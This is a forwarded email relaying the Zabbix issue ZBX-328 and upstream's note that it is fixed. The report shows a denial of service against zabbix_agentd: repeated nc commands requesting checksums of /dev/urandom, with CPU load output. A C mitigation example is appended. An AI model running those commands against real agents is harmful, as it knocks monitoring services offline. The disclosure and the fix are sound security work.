hi, see upstream's response.
----- Forwarded message from "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]> -----

From: "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]>
Date: Tue, 25 Mar 2008 16:31:18 +0200 (EET)
To: [EMAIL PROTECTED]
Subject: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd

    [ https://support.zabbix.com/browse/ZBX-328?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Alexei Vladishev closed ZBX-328.
--------------------------------

    Resolution: Fixed

The problem was fixed a couple of months ago. Please wait for 1.4.5. It will be released this week.

Alexei

> Possible DoS against zabbix-agentd
> ----------------------------------
>
>          Key: ZBX-328
>          URL: https://support.zabbix.com/browse/ZBX-328
>      Project: ZABBIX
>   Issue Type: Bug
>   Components: Agent (Unix)
>  Environment: Debian etch, kernel 2.6.18, Intel(R) Pentium(R) 4 CPU 2.80GHz
>     Reporter: Milen Rangelov
>     Assignee: Alexei Vladishev
>
> An authorized host can cause the zabbix_agentd to hang, overconsuming CPU
> resources.
> This can be triggered by sending the agent a file checksum request
> (vfs.file.cksum[file]) with file argument being some "special" device file
> like /dev/zero or /dev/urandom (the latter raises kernel CPU usage even more).
> If the malicious user sends <number_of_zabbix_agentd_children> requests, then
> the zabbix_agentd service will not be able to serve any requests until it's
> restarted.
>
> Here's some example session:
> ------------
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [1] 24429
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [2] 24431
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [3] 24433
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [4] 24435
>
> ...and some output from top:
> <snip>
> Tasks: 183 total, 5 running, 178 sleeping, 0 stopped, 0 zombie
> Cpu(s): 2.0%us, 97.0%sy, 1.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
> <snip>
>   PID USER     PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
> 24381 zabbix   30   5  5056 1032  768 R   65  0.1 4:16.01 zabbix_agentd
> 24382 zabbix   30   5  5068 1044  776 R   50  0.1 4:12.18 zabbix_agentd
> 24380 zabbix   30   5  5068 1044  776 R   50  0.1 4:01.24 zabbix_agentd
> 24379 zabbix   30   5  5056 1036  772 R   31  0.1 4:08.24 zabbix_agentd
> ------------------------
> zabbix_agentd accepts new connections, but does not serve them.
> The malicious user needs to connect from an authorized host, but it's not so
> hard to spoof it if he's on the same ethernet segment as the host running the
> zabbix_agent.

--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
   https://support.zabbix.com/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

----- End forwarded message -----
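The agent-side mitigation for the class of bug in this report, as an added example (not Zabbix's code and not the ZBX-328 fix, which the mail does not show): a checksum routine that refuses anything but a regular file and bounds the bytes it reads, so a request naming /dev/zero or /dev/urandom fails immediately instead of pinning a worker process. The function names, the 4 KiB buffer, the byte cap and the temporary-file helper are this example's own assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* CRC core of POSIX cksum: poly 0x04C11DB7, MSB first; the caller feeds the length and complements. */
static uint32_t cksum_update(uint32_t crc, const unsigned char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        crc ^= (uint32_t)buf[i] << 24;
        for (int b = 0; b < 8; b++) crc = (crc & 0x80000000u) ? (crc << 1) ^ 0x04C11DB7u : crc << 1;
    }
    return crc;
}

/* Returns 0 and stores the cksum in *out, or -1 with errno set: EINVAL for anything that is not a
 * regular file (device, FIFO, directory), EFBIG above max_bytes (also re-checked while reading,
 * since a log file can keep growing), otherwise the open()/read() error. The type check is fstat()
 * on the open descriptor, so the path cannot be swapped between the check and the read. */
int safe_file_cksum(const char *path, off_t max_bytes, uint32_t *out)
{
    int fd = open(path, O_RDONLY | O_NONBLOCK); if (fd < 0) return -1;  /* no hang on a writer-less FIFO */
    struct stat st; if (fstat(fd, &st) != 0) { close(fd); return -1; }
    if (!S_ISREG(st.st_mode)) { close(fd); errno = EINVAL; return -1; }
    if (st.st_size > max_bytes) { close(fd); errno = EFBIG; return -1; }
    uint32_t crc = 0; uint64_t total = 0; unsigned char buf[4096]; ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) {
        if ((total += (uint64_t)n) > (uint64_t)max_bytes) { close(fd); errno = EFBIG; return -1; }
        crc = cksum_update(crc, buf, (size_t)n);
    }
    int saved = errno; close(fd);
    if (n < 0) { errno = saved; return -1; }
    for (uint64_t len = total; len != 0; len >>= 8) {  /* cksum appends the byte count, LSB first */
        unsigned char b = (unsigned char)(len & 0xffu); crc = cksum_update(crc, &b, 1);
    }
    *out = ~crc; return 0;
}

/* Demo helper: write len bytes to a temporary regular file, checksum it through the guard, delete it. */
int cksum_bytes_via_tmpfile(const void *data, size_t len, off_t max_bytes, uint32_t *out)
{
    char path[] = "/tmp/cksum_demo_XXXXXX";
    int fd = mkstemp(path); if (fd < 0) return -1;
    int rc = (write(fd, data, len) == (ssize_t)len) ? 0 : -1;
    close(fd);
    if (rc == 0) rc = safe_file_cksum(path, max_bytes, out);
    unlink(path);
    return rc;
}
```

An empty regular file yields 4294967295, the same value as `cksum < /dev/null`, while a device file, a directory or a file above the cap is rejected before any read loop starts.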